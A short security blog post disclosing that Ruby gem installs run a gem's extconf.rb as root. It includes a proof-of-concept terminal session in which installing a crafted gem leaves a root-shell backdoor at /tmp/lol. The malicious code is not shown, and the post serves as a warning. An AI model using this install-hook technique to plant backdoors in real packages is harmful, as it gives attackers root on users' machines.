Ruby gems can execute code as root while they're being installed

29 May 2016 18:07 | ruby | security

Another hilarious and trivial rubygems exploit.  The file ext/<ext>/extconf.rb
gets executed as root during installation.  A malicious gem could put code in
there that installs a backdoor.

Demonstration PoC:

$ ls -la /tmp/lol<br/>
ls: cannot access /tmp/lol: No such file or directory<br/>
$ sudo gem install file-4.3.2.gem <br/>
Building native extensions.  This could take a while...<br/>
Successfully installed file-4.3.2<br/>
Parsing documentation for file-4.3.2<br/>
Done installing documentation for file after 0 seconds<br/>
1 gem installed<br/>
$ /tmp/lol<br/>
# id<br/>
uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)<br/>
# <br/>

Again, be *very* careful what gems you install!